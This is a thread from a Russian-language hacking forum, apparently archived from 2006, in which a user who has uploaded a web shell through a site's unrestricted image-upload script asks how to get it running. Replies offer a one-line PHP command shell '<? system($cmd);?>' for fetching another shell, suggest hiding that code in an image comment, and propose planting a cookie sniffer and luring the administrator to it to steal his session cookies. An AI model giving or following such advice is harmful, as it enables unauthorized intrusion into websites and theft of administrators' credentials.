Просмотр полной версии : Зальем файлы на сайт через get_image.php
На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..
Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
Хотя файлы с другим разрешением открываются.
Все файлы появляются в папке /www.site.ru/img/
Какие есть варианты? :)
KaMiKadZe
08.05.2006, 10:50
На сайте.. стоит get_image.php скриптик, который должен служить для заливки на сайт картинок.
Но он, также пропускает и все другие файлы..такие как php, html, и все остальное короче..
Залил я туда shell, но там пишут, что "Для выполнения оно должно иметь права 0755 ли 0711"
Хотя файлы с другим разрешением открываются.
Все файлы появляются в папке /www.site.ru/img/
Какие есть варианты? :)
Если так то ничего! Можно попробывать залить вот такую команду
<? system($cmd);?>
И потом через неё залить шелл другой который тебе нужен!
Может и не работать но попробуй!
Или добавить <? system($cmd); ?> в коментарий картинки авось выполниться!
Вот в чем вся проблема (возможно :) )
Для папки img присвоены низшие привилегии. А для доступа в остальные папки (www и ниже) могут требоваться root привилегии... Не обладая ими, твой shell не может выполнить определенные команды, поэтому отказывает грузиться. Выход... Даже не знаю... Можешь залить в папку img что-нить снифо-подобное и дать ссылу админу с сообщением об ошибке (ака дорогой администратор site.ru, обратясь по этому адресу www.site.ru/img/admin_kyky.php скрипт выдает ошибку). Так ты можешь получить c00kie$ администратора (если тебе оны нужны/если они вообще там есть =) )... Короче, мути сам =)
З.Ы.
Что касается system($cmd); - скорее всего, смысла не будет, т.к. и исполняемые приложения, и папки (где эти приложения находятся) тоже требуют root-a. Но, попытка не пытка =)
З.З.Ы
IMHO - не бить ;)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot